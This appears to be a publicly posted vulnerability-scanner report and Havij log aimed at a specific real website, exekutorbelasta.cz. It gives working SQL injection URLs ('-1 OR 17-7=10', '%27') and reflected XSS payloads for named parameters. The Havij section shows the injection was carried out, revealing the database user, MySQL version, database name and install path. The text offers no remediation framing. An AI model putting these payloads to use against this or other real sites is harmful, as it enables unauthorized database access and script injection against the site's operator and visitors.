- Boolean Based SQL Injection
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.exekutorbelasta.cz/show_movitosti.php?id=-1 OR 17-7=10
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- |||
- [High Possibility] SQL Injection
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.exekutorbelasta.cz/show_movitosti.php?id=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: %27
- |||
- XSS - Cross-site Scripting
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.exekutorbelasta.cz/form_movite.php?id_form=157'"--></style></script><script>alert(0x0001E7)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: id_form
- Parameter Type: Querystring
- Attack Pattern: 157'"--></style></script><script>alert(0x0001E7)</script>
- -
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.exekutorbelasta.cz/form_movite.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: e_mail
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000265)</script>
- -
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.exekutorbelasta.cz/form_movite.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: fax
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000269)</script>
- |||
- Database User Has Admin Privileges
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.exekutorbelasta.cz/show_movitosti.php?id=-1 OR 17-7=10
- Vulnerability Classifications: OWASP A6 CWE-16
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- |||
- PHP Version Disclosure
- Severity : Low
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.exekutorbelasta.cz/
- Vulnerability Classifications: PCI 6.5.6 OWASP A6
- Extracted Version: PHP/5.2.0-8+etch11
- |||
- Database Error Message
- Severity : Low
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.exekutorbelasta.cz/show_movitosti.php?id=%27
- Vulnerability Classifications: PCI 6.5.6 OWASP A6 CAPEC-118 CWE-200 209
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: %27
- |||
- Havij log.
- Target: http://www.exekutorbelasta.cz/show_movitosti.php?id=-1 OR 17-7=10
- Web Server: Apache
- Powered-by: PHP/5.2.0-8+etch11
- DB Server: MySQL
- Current User: radek@localhost
- Sql Version: 5.0.32-Debian_7etch12
- Current DB: belasta
- System User: radek@localhost
- Installation dir: /usr/
- Data Bases: information_schema
- |||